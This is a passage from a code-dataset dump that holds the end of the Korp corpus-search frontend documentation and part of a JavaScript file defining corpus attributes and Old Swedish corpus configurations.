`pos_tag=\"${tokens.join(\" | \")}\"`}```. \n * `isStructAttr`: `boolean`. If `true` the attribute will be treated as a structural attribute in all sense except it will be included in the `show` query parameter instead of `show_struct` for KWIC requests. Useful for structural attributes that extend to smaller portions of the text, such as name tagging.\n * optional keys and values that can be utilized in the extendedTemplate / extendedController. See <#ref customizing-extended-search|customizing extended search>.\n\n* `structAttributes`: refers to higher level metadata attributes. Examples include author, publishing year, URL etc. Structural attributes support the same settings as the word attributes.\n\n* `customAttributes`: creates fields in the sidebar that have no corresponding attribute in the backend. Useful for combining two different attributes. All settings concerning sidebar format for normal attributes apply in addition to:\n * `customType`: `\"struct\"` / `\"pos\"` - decides if the attribute should be grouped under word attributes or text attributes.\n * `pattern`: Same as pattern for normal attributes, but `struct_attrs` and `pos_attrs` also available. Example: `'<p style=\"margin-left: 5px;\"><%=struct_attrs.text_title - struct_attrs.text_description%></p>'`\n* `readingMode`: If set, enables reading mode/text view for the\n corpora. A link will appear in the sidebar and if clicked a new tab\n containg the text will be opened. This depends on your corpus having a\n structural attribute identifying the line in the KWIC (such as `sentence_id`\n , this may be configured with `settings.readingModeField`)\n and also a `_head` and `_tail` attribute, containing\n the whitespace before and after a token. The value can be set to:\n ```\n readingMode: {\n directive: \"standard-reading-mode\"\n }\n ```\n for basic support. If something else is needed you can write your own directive\n in `scripts/` and use that one instead. Contact Språkbanken for an example on\n how to write a directive.\n\n## Customizing extended search\n\nIt is possible to customize the standard input field of extended search into anything. Any key can be added to an attribute to be provided to the `extendedController` / `extendedTemplate`. Simple example:\n\n\n var myReusableTemplate = '<div><input ng-if=\"inputType == \\'text\\'\" type=\"text\"><input ng-if=\"inputType == \\'number\\'\" type=\"number\"></div>';\n\n var myController = function($scope, $location) {\n // $scope.inputType is available here also\n // dependency injection of Angular services such as $location are possible\n };\n\n settings.corpora[\"testcorpus\"] = {\n id: \"testcorpus\",\n title: \"The Korp Test Corpus\",\n description: \"A test corpus for testing Korp.\",\n attributes: {\n myAttr: {\n label: \"myAttr\",\n extendedTemplate: myReusableTemplate,\n extendedController: myController,\n inputType: \"text\"\n }\n }\n };\n\nHowever, `extendedController` is not mandatory and only shown in this example for documentation purposes.\n\n### Template requisites\n\nIn order for your template to work, it must set its value in `scope.model`, for example by using `ng-model=\"model\"` for input-fields.\n\n### autoc\n\nA directive that autocompletes word forms to lemgrams or senses using Karp. Used in the following way:\n\n <autoc placeholder=\"placeholder\" type=\"lemgram\" model=\"model\"\n disable-lemgram-autocomplete=\"disableLemgramAutocomplete\"\n text-in-field=\"textInField\">\n\nWhere `type` may be either `lemgram` or `sense`. `model` will be the selected lemgram / sense. `textInField` will be actual user input\n(user did not select anything). Placeholder will contain the pretty-printed lemgram / sense. It is also possible to make the element fall back to a \"normal\"\ntext field by setting `disableLemgramAutocomplete` to `false`.\n\n### escaper\n\n`escaper` is a directive that takes the user's input and escapes any regexp characters before saving it to `scope.model`.\nWhen the model changes it automatically de-escapes any regexp characters before showing the value to the user. Input must be saved to `scope.input` for it to work. Example: `<input ng-model=\"input\" escaper>`\n\n## Parallel Corpora\n\nParallel corpora need to have its own mode. Use `modes/parallel_mode.js`, but replace the corpus definitions. Change the line `var start_lang = \"swe\";` to whatever language that should be the default search language.\n\nThe corpora declaration for parallel corpora is different in some important ways. Example:\n\n~~~~~~~\nsettings.corpora[\"saltnld-sv\"] = {\n id: \"saltnld-sv\",\n lang: \"swe\",\n linkedTo: [\"saltnld-nl\"],\n title: \"SALT svenska-nederländska\",\n context: context.defaultAligned,\n within: {\n \t\"link\": \"meningspar\"\n },\n attributes: {},\n structAttributes: {}\n};\n~~~~~~~\n~~~~~~~\nsettings.corpora[\"saltnld-nl\"] = {\n id: \"saltnld-nl\",\n lang: \"nld\",\n linkedTo: [\"saltnld-sv\"],\n title: \"SALT svenska-nederländska\",\n context: context.defaultAligned,\n within: {\n \t\"link\": \"meningspar\"\n },\n attributes: {},\n structAttributes: {},\n hide: true\n};\n~~~~~~~\n\nThe corpus configuration for parallel corpora needs to make explicit the links between the declared corpora. This is done using the `linkedTo` property. A corpus may declare any amount of links to other corpora. Also notice the `lang` property, used for building the correct language select menu. The `within` attribute should use the `\"link\": \"meningspar\"` value. Also note the `hide` attribute which prevents both subcorpora from being listed in the corpus chooser widget.\n\n## Rendering attribute values in the statistics-view\nThe appearance of the leftmost columns of hits in the stats table can be controlled by editing `app/config/statistics_config.js`. These change according to the 'compile based on' select menu and might need a different stringification method depending on the chosen attribute. Make sure the function returns valid html. A known issue is that annotations containing spaces when searching for more than one token works less than perfect.\n\n## Autocompletion menu\n\nKorp features an autocompletion list for searches in the Simple Search as well as in Extended for those corpus attributes configured to use `autoc`-directive (see <#ref autoc|autoc-section>). This is implemented using an Angular.js directive `autoc` that calls Karp's autocompletion function. Using Karp, Korp can autocomplete senses and lemgrams. To disable autocompletion in simple search use `settings.autocomplete = false`.\n\n## Word picture\n\nThe word picture-config object looks like this:\n\n setting.wordPictureConf = {\n pos_tag: [table_def1, tabledef2...]\n }\n\nwhere `table_def` is an array of objects that describe the resulting word picture table. `table_def1` above might look like this:\n\n [\n {rel: \"subject\", css_class: \"color_blue\"},\n \"_\",\n {rel: \"object\", css_class: \"color_purple\"},\n {rel: \"adverbial\", css_class: \"color_purple\", field_reverse: false}\n ]\n\nThe `\"_\"` refers to the placement of the hit in the table order. The value for `rel` refers to a key in `settings.wordpictureTagset` looking like this:\n\n settings.wordpictureTagset = {\n // the actual value for the pos-tag must be given in this object\n pos_tag: \"vb\", \n\n subject: \"ss\",\n object: \"obj\",\n adverbial: \"adv\"\n }\n\nThe values are the actual relations returned by the backend. The relation used is determined by `field_reverse`. If `field_reverse` is `false` (default), `dep` is used, else `head`. If you find yourself with a table full of the search word just flip the `field_reverse` switch.\n\n`css_class` simply gives a class to the column, useful for applying background color. The last supported attribute is `alt_label`, used for when another value than the relation name should be used for the table header.\n\n## Map\n\nKorp's map uses annotations to get locations. The user selects rows from the statistics table and points derived from different rows will have different colors. The selected corpora must have structural attributes with location data in them. The format is `Fukuoka;JP;33.6;130.41667` - the location name, the country, latitude and longitude separated by `;`.\n\n Also the name of the attribute must contain `\"__\"` and `\"geo\"` to show up in the list of supported attributes.\n\n__settings.newMapEnabled__ - `boolean`. The map should be enabled. The weird name is because another map existed before, but has been remove. The name will change in upcoming releases.\n__settings.mapCenter__ - Where the center of the map should be located when user opens map. Example: \n\n settings.mapCenter = {\n lat: 62.99515845212052,\n lng: 16.69921875,\n zoom: 4\n };\n\n\n## News widget\n\nBy setting a `newsDeskUrl` on settings, the news widget is enabled. The widget simply fetches a json-file from the given URL. Short example of such a file, including only one news item with its title and body in two languages and a date:\n\n [\n {\n \"h\": {\n \"en\": \"<p>Longer description in English</p>\",\n \"sv\": \"<p>Längre beskrivning på svenska</p>\"\n },\n \"t\": {\n \"en\": \"English Title\",\n \"sv\": \"Svensk Titel\"\n },\n \"d\": \"2017-03-01\"\n }\n ]\n\n## <a name=\"summary-settings\">Summary of settings</a>\n\nSettings are required unless specified to be optional.\n\n__autocomplete__ - Boolean. Enable autocomplete (see **autoc**-directive) for simple search.\n\n__languages__ - Array of supported interface language codes s.a. `[\"en\", \"sv\"]`\n\n__defaultLanguage__ - The default interface language. Example: `\"sv\"`\n\n__downloadFormats__ - Available formats of KWIC-download. See supplied `config.js`.\n\n__downloadFormatParams__ - Settings for KWIC-download. See supplied `config.js`.\n\n__wordAttributeSelector__ - `\"union\"` / `\"intersection\"`. Controls attribute list in extended search. Use all selected corpora *word* attributes or only the attributes common to selected corpora.\n\n__structAttributeSelector__ - Same as __wordAttributeSelector__, but for structural attributes.\n\n__reduceWordAttributeSelector__ - Same as __wordAttributeSelector__, but for the \"compile based on\"-configuration in statistics. Warning: if set to `\"union\"`, the statistics call will fail if user selects an attribute that is not supported by a selected corpus.\n\n__reduceStructAttribute_selector__ - Same as __reduceWordAttributeSelector__, but for structural attributes.\n\n__newsDeskUrl__ - See **News widget**. Optional.\n\n__wordpictureTagset__ - See **Word picture**\n\n__wordPictureConf__ - See **Word picture**\n\n__visibleModes__ - See **Adding modes**\n\n__modeConfig__ - See **Adding modes**\n\n__primaryColor__ - Background color in corpus chooser, CSS color. Example: `\"rgb(221, 233, 255)\"`\n\n__primaryLight__ - Background color of settings area, CSS color. Example: `\"rgb(221, 233, 255)\"`\n\n__defaultOverviewContext__ - The default context for KWIC-view. Use a context that is supported by the majority of corpora in the mode (URLs will be shorter). E.g.: `\"1 sentence\"`. For corpora that do not support this context an additional parameter will be sent to the backend based on the `context`-setting in the corpus.\n\n__defaultReadingContext__ - Same as __defaultOverviewContext__, but for the context-view. Use a context larger than the __defaultOverviewContext__.\n\n__defaultWithin__ - An object containing the structural elements of a corpus. Default within is used unless a corpus overrides the setting using `within`. Example:\n\n settings.defaultWithin = {\n \"sentence\": \"sentence\",\n \"paragraph\": \"paragraph\"\n };\n\nIn simple search, we will search within the default context and supply extra information for the corpora that do not support the default context.\n\nIn extended search, the default `within` will be used unless the user specifies something else. In that case the user's choice will be used for all corpora that support it and for corpora that do not support it, a supported `within` will be used.\n\n__cqpPrio__ - An array of attributes to order and-clauses in CQP-expressions by. Order the array by how specific an attribute is in increasing order. `word` will probably be the most specific attribute and should be placed last, while POS-tags will be near the beginning. A well ordered list will speed up queries significantly.\n\n__defaultOptions__ - Object containing the default operators for extended search. May be overridden for each attribute by setting `opts` on the attribute-configuration. The object keys are translation keys and values are the frontend's internal representation of CQP. Example:\n\n settings.defaultOptions = {\n \"is\": \"=\",\n \"is_not\": \"!=\",\n \"starts_with\": \"^=\",\n \"contains\": \"_=\",\n \"ends_with\": \"&=\",\n \"matches\": \"*=\",\n \"matches_not\": \"!*=\",\n }\n\nExplanation of internal format:\n\n Internal representation CQP Note\n---- ------- --- ----\nstarts with `[key ^= \"val\"]` `[key = \"val.*\"]`\ncontains `[key _= \"val\"]` `[key = \".*val.*\"]`\nends with `[key &= \"val\"]` `[key = \".*val\"]`\nmatches `[key *= \"val\"]` `[key = \"val\"]` Used with `escaper`-directive, regexp\nmatches not `[key !*= \"val\"]` `[key != \"val\"]` special characters will not be escaped.\n\n**TODO: move these explanations to a better place** Then we have the five last operators again, but using `contains` instead of `=`:\n\n Internal representation CQP Note\n---- ------- --- ----\nstarts with `[key starts_with_contains \"val\"]` `[key contains \"val.*\"]`\ncontains `[key incontains_contains \"val\"]` `[key contains \".*val.*\"]` Strange name due to CQPParser getting confused by `contains_contains`\nends with `[key ends_with_contains \"val\"]` `[key contains \".*val\"]`\nmatches `[key regexp_contains \"val\"]` `[key contains \"val\"]` Used with `escaper`-directive, regexp\nmatches not `[key not_regexp_contains \"val\"]` `[key not contains \"val\"]` special characters will not be escaped.\n\n__cgiScript__ - URL to Korp CGI-script\n\n__downloadCgiScript__ - URL to Korp download CGI-script\n\n__wordpicture__ - Boolean. Enable word picture.\n\n__statisticsCaseInsensitiveDefault__ - Boolean. Selects case-insensitive for \"compile based on\" by default.\n\n__inputCaseInsensitiveDefault__ - Boolean. Selects case-insensitive for simple search by default.\n\n__corpora__ - See **Corpora**\n\n__corpusListing__ - After specifying all corpora in a modes-file use:\n`settings.corpusListing = new CorpusListing(settings.corpora);` to enable the configuration. For parallel corpora use: `settings.corpusListing = new ParallelCorpusListing(settings.corpora, parseLocationLangs());`\n\n__corporafolders__ - Create a directory-structure in corpus chooser. Example:\n\n settings.corporafolders.foldername = {\n title: \"A folder\",\n contents: [\"corpus1\", \"corpus2\"],\n description: \"Optional description\"\n };\n\n settings.corporafolders.foldername.subfolder = {\n title: \"A sub folder\",\n contents: [\"corpus3\", \"corpus4\"]\n }\n\n__preselectedCorpora__ - An array of corpus (internal) names or folder names. Given corpora and corpora in folders will be selected on load. To select only a subfolder write `folder.subfolder`.\n\n__newMapEnabled__ - See **Map**.\n\n__mapCenter__ - See **Map**.\n\n__hitsPerPageValues__ - An array of possible number of hits per page for example: `[25,50,75,100]`\n\n__hitsPerPageDefault__ - The number of hits per page that Korp should select by default. If emitted, fallback value is the first element in `hitsPerPageValues`\n\n# Developing the Korp Frontend\n\nHere is where we present details on how to install development dependencies for the Korp frontend and how to build and distribute the frontend code.\n\n## Source code\n\nThe source code is available on [Github][github-frontend].\n\n## Setting up the development environment\n\nThe Korp frontend uses a plethora of technologies and has a corresponding amount of dependencies. Luckily, a set of package managers do all the heavy lifting and so you should be up and running in no time. Simply follow these steps:\n\n* Install Yarn\n* Fetch the latest Korp source release.\n* `cd` to the Korp folder you just checked out and run `yarn` in order to fetch the local dependencies. This includes libs for compiling transpiling javascript, building, running a dev server, as well as the required client side javascript libs utilized directly by Korp.\n\nYou are now ready to start the dev server, do so by running `yarn dev`. In you browser, open `http://localhost:9111` to launch Korp. Now, as you edit the Korp code, javascript and Sass files are automatically compiled/transpiled as required, additionally causing the browser window to be reloaded to reflect the new changes.\n\n## Localization\n\nKorp does runtime DOM manipulation when the user changes language. Using an Angular filter to specify which translation key looks like this:\n\n <div>{{'my_key' | loc}}</div>\n\n[Deprecation warning] Before the Angular approach we used the `rel` attribute, like so (but you shouldn't any more):\n `<span rel=\"localize[translation_key]\">...</span>`\n\n## Map\n\nModify the map with configuration, `scripts/map_controllers.coffee` or the Geokorp-component located in `components/geokorp`. Geokorp wraps [Leaflet][leaflet] and adds further functionality such as integration with Angular, marker clustering, marker styling and information when selecting a marker.\n\n## Building a distribution\n\nBuilding a distribution is as simple as running the command `yarn build`. A `dist` folder is created. These are the files to use for production deployment. The build system performs concatenation and minimization of JavaScript and CSS source files, giving the resulting code a lighter footprint.\n\n[MIT]: https://opensource.org/licenses/MIT\n[angular-i18n]: https://github.com/angular/bower-angular-i18n\n[leaflet]: http://leafletjs.com/\n[github-frontend]: https://github.com/spraakbanken/korp-frontend/\n"
},
{
"alpha_fraction": 0.5289922952651978,
"alphanum_fraction": 0.5348564386367798,
"avg_line_length": 26.5045166015625,
"blob_id": "fa23a883118699191ff092dcdd50a9a0c27b3762",
"content_id": "9ec67870e0a7bff15dee70ef2aec7c2613759254",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 21377,
"license_type": "permissive",
"max_line_length": 939,
"num_lines": 775,
"path": "/app/modes/common.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "settings.senseAutoComplete = `<autoc model='model' placeholder='placeholder' type='sense' text-in-field='textInField'/>`;\n\nvar karpLemgramLink = `https://spraakbanken.gu.se/karp/#?mode=DEFAULT&search=extended||and|lemgram|equals|<%= val.replace(/:\\\\d+/, '') %>`;\n\nvar liteOptions = {\n is: `=`,\n is_not: `!=`,\n};\n\nvar setOptions = {\n is: `contains`,\n is_not: `not contains`,\n};\n\nvar probabilitySetOptions = {\n is: `highest_rank`,\n is_not: `not_highest_rank`,\n contains: `rank_contains`,\n contains_not: `not_rank_contains`,\n};\n\nvar extendedSetOptions = {\n is: `contains`,\n is_not: `not contains`,\n starts_with: `starts_with_contains`,\n contains: `incontains_contains`,\n ends_with: `ends_with_contains`,\n matches: `regexp_contains`,\n matches_not: `not_regexp_contains`,\n};\n\nvar defaultContext = {\n \"1 sentence\": `1 sentence`,\n};\n\nvar spContext = {\n \"1 sentence\": `1 sentence`,\n \"1 paragraph\": `1 paragraph`,\n};\n\nvar spWithin = {\n sentence: `sentence`,\n paragraph: `paragraph`,\n};\n\nvar attrs = {}; // positional attributes\nvar sattrs = {}; // structural attributes\n\nattrs.pos = {\n label: `pos`,\n translationKey: `pos_`,\n dataset: {\n AB: `AB`,\n \"MID|MAD|PAD\": `DL`,\n DT: `DT`,\n HA: `HA`,\n HD: `HD`,\n HP: `HP`,\n HS: `HS`,\n IE: `IE`,\n IN: `IN`,\n JJ: `JJ`,\n KN: `KN`,\n NN: `NN`,\n PC: `PC`,\n PL: `PL`,\n PM: `PM`,\n PN: `PN`,\n PP: `PP`,\n PS: `PS`,\n RG: `RG`,\n RO: `RO`,\n SN: `SN`,\n UO: `UO`,\n VB: `VB`,\n },\n opts: liteOptions,\n extendedComponent: `datasetSelect`,\n escape: false,\n order: 0,\n};\n\nattrs.msd = {\n label: `msd`,\n opts: settings.defaultOptions,\n extendedTemplate: `<input ng-model=\"input\" class=\"arg_value\" escaper ng-model-options='{debounce : {default : 300, blur : 0}, updateOn: \"default blur\"}'>` +\n `<span ng-click=\"onIconClick()\" class=\"fa fa-info-circle\"></span>`,\n extendedController: function($scope, $uibModal) {\n var modal = null;\n\n $scope.onIconClick = function() {\n var msdHTML = settings.markup.msd;\n modal = $uibModal.open({\n template: `<div>` +\n `<div class=\"modal-header\">` +\n `<h3 class=\"modal-title\">{{'msd_long' | loc:lang}}</h3>` +\n `<span ng-click=\"clickX()\" class=\"close-x\">×</span>` +\n `</div>` +\n `<div class=\"modal-body msd-modal\" ng-click=\"msdClick($event)\" ng-include=\"` + msdHTML + `\"></div>` +\n `</div>`,\n scope: $scope,\n });\n };\n $scope.clickX = function(event) {\n modal.close();\n };\n $scope.msdClick = function(event) {\n val = $(event.target).parent().data(`value`);\n if(!val) return;\n $scope.input = val;\n modal.close();\n };\n },\n};\nattrs.baseform = {\n label: `baseform`,\n type: `set`,\n opts: extendedSetOptions,\n extendedTemplate: `<input ng-model='input' escaper>`,\n order: 1,\n};\nattrs.gloss = {\n label: `gloss`,\n type: `set`,\n opts: extendedSetOptions,\n order: 2,\n};\nattrs.lemgram = {\n label: `lemgram`,\n type: `set`,\n opts: setOptions,\n stringify: function(lemgram) {\n // TODO: what if we're getting more than one consequtive lemgram back?\n return util.lemgramToString(_.trim(lemgram), true);\n },\n externalSearch: karpLemgramLink,\n internalSearch: true,\n extendedTemplate: `<autoc model='model' placeholder='placeholder' type='lemgram' typeahead-close-callback='checkForError(valueSelected)' text-in-field='textInField'/>` +\n `<span ng-if='valueError' style='color: red; position: relative; top: 3px; margin-left: 6px'>{{'choose_lemgram' | loc:lang}}</span>`,\n extendedController: function($scope) {\n $scope.valueError = false;\n\n $scope.checkForError = function(valueSelected) {\n $scope.valueError = !valueSelected;\n };\n },\n order: 2,\n};\nattrs.dalinlemgram = {\n label: `dalin-lemgram`,\n type: `set`,\n opts: setOptions,\n stringify: function(lemgram) {\n // TODO: what if we're getting more than one consequtive lemgram back?\n return util.lemgramToString(_.trim(lemgram), true);\n },\n externalSearch: karpLemgramLink,\n internalSearch: true,\n extendedTemplate: `<autoc model='model' placeholder='placeholder' type='lemgram' variant='dalin' text-in-field='textInField'/>`,\n order: 2,\n};\nattrs.saldo = {\n label: `saldo`,\n type: `set`,\n opts: setOptions,\n stringify: function(saldo) {\n return util.saldoToString(saldo, true);\n },\n externalSearch: `https://spraakbanken.gu.se/karp/#?mode=DEFAULT&search=extended||and|sense|equals|<%= val %>`,\n internalSearch: true,\n extendedTemplate: settings.senseAutoComplete,\n order: 3,\n};\n\nattrs.dep = {\n label: `dep`,\n type: `set`,\n opts: extendedSetOptions,\n order: 3,\n};\n\nattrs.dephead = {\n label: `dephead`,\n displayType: `hidden`,\n};\nattrs.deprel = {\n label: `deprel`,\n translationKey: `deprel_`,\n extendedComponent: `datasetSelect`,\n dataset: {\n \"++\": `++`,\n \"+A\": `+A`,\n \"+F\": `+F`,\n AA: `AA`,\n AG: `AG`,\n AN: `AN`,\n AT: `AT`,\n CA: `CA`,\n DB: `DB`,\n DT: `DT`,\n EF: `EF`,\n EO: `EO`,\n ES: `ES`,\n ET: `ET`,\n FO: `FO`,\n FP: `FP`,\n FS: `FS`,\n FV: `FV`,\n \"I?\": `I?`,\n IC: `IC`,\n IG: `IG`,\n IK: `IK`,\n IM: `IM`,\n IO: `IO`,\n IP: `IP`,\n IQ: `IQ`,\n IR: `IR`,\n IS: `IS`,\n IT: `IT`,\n IU: `IU`,\n IV: `IV`,\n JC: `JC`,\n JG: `JG`,\n JR: `JR`,\n JT: `JT`,\n KA: `KA`,\n MA: `MA`,\n MS: `MS`,\n NA: `NA`,\n OA: `OA`,\n OO: `OO`,\n OP: `OP`,\n PL: `PL`,\n PR: `PR`,\n PT: `PT`,\n RA: `RA`,\n SP: `SP`,\n SS: `SS`,\n TA: `TA`,\n TT: `TT`,\n UK: `UK`,\n VA: `VA`,\n VO: `VO`,\n VS: `VS`,\n XA: `XA`,\n XF: `XF`,\n XT: `XT`,\n XX: `XX`,\n YY: `YY`,\n CJ: `CJ`,\n HD: `HD`,\n IF: `IF`,\n PA: `PA`,\n UA: `UA`,\n VG: `VG`,\n ROOT: `ROOT`,\n },\n opts: liteOptions,\n};\nattrs.prefix = {\n label: `prefix`,\n type: `set`,\n opts: setOptions,\n stringify: function(lemgram) {\n return util.lemgramToString(lemgram, true);\n },\n externalSearch: karpLemgramLink,\n internalSearch: true,\n extendedTemplate: `<autoc model='model' placeholder='placeholder' type='lemgram' variant='affix' text-in-field='textInField'/>`,\n};\nattrs.suffix = {\n label: `suffix`,\n type: `set`,\n opts: setOptions,\n stringify: function(lemgram) {\n return util.lemgramToString(lemgram, true);\n },\n externalSearch: karpLemgramLink,\n internalSearch: true,\n extendedTemplate: `<autoc model='model' placeholder='placeholder' type='lemgram' variant='affix' text-in-field='textInField'/>`,\n};\nattrs.ref = {\n label: `ref`,\n displayType: `hidden`,\n};\nattrs.link = {\n label: `sentence_link`,\n};\nattrs.ne_ex = {\n label: `ne_expr`,\n translationKey: `ne_expr_`,\n extendedComponent: `datasetSelect`,\n isStructAttr: true,\n dataset: [\n `ENAMEX`,\n `TIMEX`,\n `NUMEX`,\n ],\n};\nattrs.ne_type = {\n label: `ne_type`,\n translationKey: `ne_type_`,\n extendedComponent: `datasetSelect`,\n isStructAttr: true,\n dataset: [\n `LOC`,\n `PRS`,\n `ORG`,\n `EVN`,\n `WRK`,\n `OBJ`,\n `MSR`,\n `TME`,\n ],\n};\nattrs.ne_subtype = {\n label: `ne_subtype`,\n translationKey: `ne_subtype_`,\n extendedComponent: `datasetSelect`,\n isStructAttr: true,\n dataset: [\n `AST`,\n `GPL`,\n `PPL`,\n `FNC`,\n `STR`,\n `HUM`,\n `MTH`,\n `ANM`,\n `CLC`,\n `FIN`,\n `ATH`,\n `CLT`,\n `PLT`,\n `TVR`,\n `EDU`,\n `TRN`,\n `CRP`,\n `HPL`,\n `WTH`,\n `CLU`,\n `ATL`,\n `RLG`,\n `WRT`,\n `RTV`,\n `WAO`,\n `PRJ`,\n `WMD`,\n `WAE`,\n `MDC`,\n `FWP`,\n `CMP`,\n `VHA`,\n `VHG`,\n `VHW`,\n `PRZ`,\n `PRD`,\n `VLM`,\n `TMP`,\n `INX`,\n `DST`,\n `PRC`,\n `CUR`,\n `DEN`,\n `DSG`,\n `SPD`,\n `FRQ`,\n `AGE`,\n `MSU`,\n `WMU`,\n `CMU`,\n `WEB`,\n `PSS`,\n `CVU`,\n `IDX`,\n `LST`,\n `DAT`,\n `PER`,\n ],\n stringify: function(val) {\n lString = util.getLocaleStringUndefined(`ne_subtype_` + val);\n return lString || val;\n },\n};\nattrs.ne_name = {\n label: `ne_name`,\n isStructAttr: true,\n};\nsattrs.date = {\n label: `date`,\n};\n\nvar modernAttrsOld = {\n pos: attrs.pos,\n msd: attrs.msd,\n lemma: attrs.baseform,\n lex: attrs.lemgram,\n saldo: attrs.saldo,\n dephead: attrs.dephead,\n deprel: attrs.deprel,\n ref: attrs.ref,\n prefix: attrs.prefix,\n suffix: attrs.suffix,\n};\n\n\nvar modernAttrs = {\n pos: attrs.pos,\n msd: attrs.msd,\n lemma: attrs.baseform,\n lex: attrs.lemgram,\n dephead: attrs.dephead,\n deprel: attrs.deprel,\n ref: attrs.ref,\n prefix: attrs.prefix,\n suffix: attrs.suffix,\n ne_ex: attrs.ne_ex,\n ne_type: attrs.ne_type,\n ne_subtype: attrs.ne_subtype,\n ne_name: attrs.ne_name,\n complemgram: {\n label: `complemgram`,\n internalSearch: true,\n ranked: true,\n display: {\n expandList: {\n splitValue: function(value) { return value.split(`+`); },\n searchKey: `lex`,\n joinValues: ` + `,\n stringify: function(lemgram) { return util.lemgramToString(lemgram, true); },\n linkAllValues: true,\n },\n },\n type: `set`,\n hideStatistics: true,\n hideExtended: true,\n hideCompare: true,\n },\n compwf: {\n label: `compwf`,\n display: {\n expandList: {},\n },\n type: `set`,\n hideStatistics: true,\n hideExtended: true,\n hideCompare: true,\n },\n sense: {\n label: `sense`,\n type: `set`,\n ranked: true,\n display: {\n expandList: {\n internalSearch: function(key, value) { return `[` + key + ` highest_rank '` + regescape(value) + `']`; },\n },\n },\n stringify: function(sense) { return util.saldoToString(sense, true); },\n opts: probabilitySetOptions,\n externalSearch: `https://spraakbanken.gu.se/karp/#?mode=DEFAULT&search=extended||and|sense|equals|<%= val %>`,\n internalSearch: true,\n extendedTemplate: settings.senseAutoComplete,\n },\n};\n\nvar modernAttrs2 = {\n pos: attrs.pos,\n msd: attrs.msd,\n lemma: attrs.baseform,\n lex: attrs.lemgram,\n dephead: attrs.dephead,\n deprel: attrs.deprel,\n ref: attrs.ref,\n prefix: attrs.prefix,\n suffix: attrs.suffix,\n ne_ex: attrs.ne_ex,\n ne_type: attrs.ne_type,\n ne_subtype: attrs.ne_subtype,\n ne_name: attrs.ne_name,\n complemgram: modernAttrs.complemgram,\n compwf: modernAttrs.compwf,\n sense: modernAttrs.sense,\n sentiment: {\n label: `sentiment`,\n },\n blingbring: {\n label: `blingbring`,\n type: `set`,\n internalSearch: true,\n },\n swefn: {\n label: `swefn`,\n type: `set`,\n externalSearch: `https://spraakbanken.gu.se/karp/#?mode=swefn&search=sense%7C%7Cswefn--<%= val %>`,\n internalSearch: true,\n },\n};\n\nvar lexClassesText = {\n text_blingbring: {\n label: `blingbring`,\n type: `set`,\n isStructAttr: true,\n ranked: true,\n order: 500,\n display: {\n expandList: {\n internalSearch: function(key, value) { return `[_.text_blingbring highest_rank '` + regescape(value) + `']`; },\n linkAllValues: true,\n showAll: true,\n },\n },\n internalSearch: true,\n },\n text_swefn: {\n label: `swefn`,\n type: `set`,\n isStructAttr: true,\n ranked: true,\n order: 501,\n display: {\n expandList: {\n internalSearch: function(key, value) { return `[_.text_swefn highest_rank '` + regescape(value) + `']`; },\n linkAllValues: true,\n showAll: true,\n },\n },\n externalSearch: `https://spraakbanken.gu.se/karp/#?mode=swefn&search=sense%7C%7Cswefn--<%= val %>`,\n internalSearch: true,\n },\n};\n\nvar readability = {\n lix: {\n label: `lix`,\n isStructAttr: true,\n order: 600,\n },\n ovix: {\n label: `ovix`,\n isStructAttr: true,\n order: 601,\n },\n nk: {\n label: `nk`,\n isStructAttr: true,\n order: 602,\n },\n};\n\nsettings.posset = {\n type: `set`,\n label: `posset`,\n opts: setOptions,\n translationKey: `pos_`,\n extendedComponent: `datasetSelect`,\n dataset: {\n AB: `AB`,\n \"MID|MAD|PAD\": `DL`,\n DT: `DT`,\n HA: `HA`,\n HD: `HD`,\n HP: `HP`,\n HS: `HS`,\n IE: `IE`,\n IN: `IN`,\n JJ: `JJ`,\n KN: `KN`,\n NN: `NN`,\n PC: `PC`,\n PL: `PL`,\n PM: `PM`,\n PN: `PN`,\n PP: `PP`,\n PS: `PS`,\n RG: `RG`,\n RO: `RO`,\n SN: `SN`,\n UO: `UO`,\n VB: `VB`,\n },\n order: 0,\n};\n\nsettings.fsvlemma = {\n type: `set`,\n label: `baseform`,\n opts: setOptions,\n extendedTemplate: `<input ng-model='model' >`,\n};\nsettings.fsvlex = {\n type: `set`,\n label: `lemgram`,\n opts: setOptions,\n extendedTemplate: `<autoc model='model' placeholder='placeholder' type='lemgram' text-in-field='textInField'/>`,\n stringify: function(str) {\n return util.lemgramToString(str, true);\n },\n externalSearch: karpLemgramLink,\n internalSearch: true,\n};\nsettings.fsvvariants = {\n type: `set`,\n label: `variants`,\n stringify: function(str) {\n return util.lemgramToString(str, true);\n },\n extendedTemplate: `<autoc model='model' placeholder='placeholder' type='lemgram' text-in-field='textInField'/>`,\n opts: setOptions,\n externalSearch: karpLemgramLink,\n internalSearch: true,\n order: 4,\n};\n\nsettings.fsvdescription = `<a target=\"_blank\" href=\"http://project2.sol.lu.se/fornsvenska/\">Fornsvenska textbanken</a> är ett projekt som digitaliserar fornsvenska texter och gör dem tillgängliga över webben. Projektet leds av Lars-Olof Delsing vid Lunds universitet.`;\n\nvar fsv_yngrelagar = {\n morphology: `fsvm`,\n id: `fsv-yngrelagar`,\n title: `Yngre lagar – Fornsvenska textbankens material`,\n description: settings.fsvdescription,\n within: settings.defaultWithin,\n context: spContext,\n attributes: {\n posset: settings.posset,\n lemma: settings.fsvlemma,\n lex: settings.fsvlex,\n variants: settings.fsvvariants,\n },\n structAttributes: {\n text_title: {\n label: `title`,\n extendedComponent: `datasetSelect`,\n dataset: [\n `Kristoffers Landslag, nyskrivna flockar i förhållande till MEL`,\n `Kristoffers Landslag, innehållsligt ändrade flockar i förhållande til MEL`,\n `Kristoffers Landslag, flockar direkt hämtade från MEL`,\n `Kristoffers Landslag`,\n ],\n },\n text_date: { label: `date` },\n },\n};\n\nvar fsv_aldrelagar = {\n morphology: `fsvm`,\n id: `fsv-aldrelagar`,\n title: `Äldre lagar – Fornsvenska textbankens material`,\n description: settings.fsvdescription,\n within: settings.defaultWithin,\n context: spContext,\n attributes: {\n posset: settings.posset,\n lemma: settings.fsvlemma,\n lex: settings.fsvlex,\n variants: settings.fsvvariants,\n },\n structAttributes: {\n text_title: {\n label: `title`,\n extendedComponent: `datasetSelect`,\n dataset: [\n `Yngre Västgötalagens äldsta fragment, Lydekini excerpter och anteckningar`,\n `Tillägg till Upplandslagen, hskr A (Ups B 12)`,\n `Södermannalagen, enligt Codex iuris Sudermannici`,\n `Östgötalagen, fragment H, ur Kyrkobalken ur Skokloster Avdl I 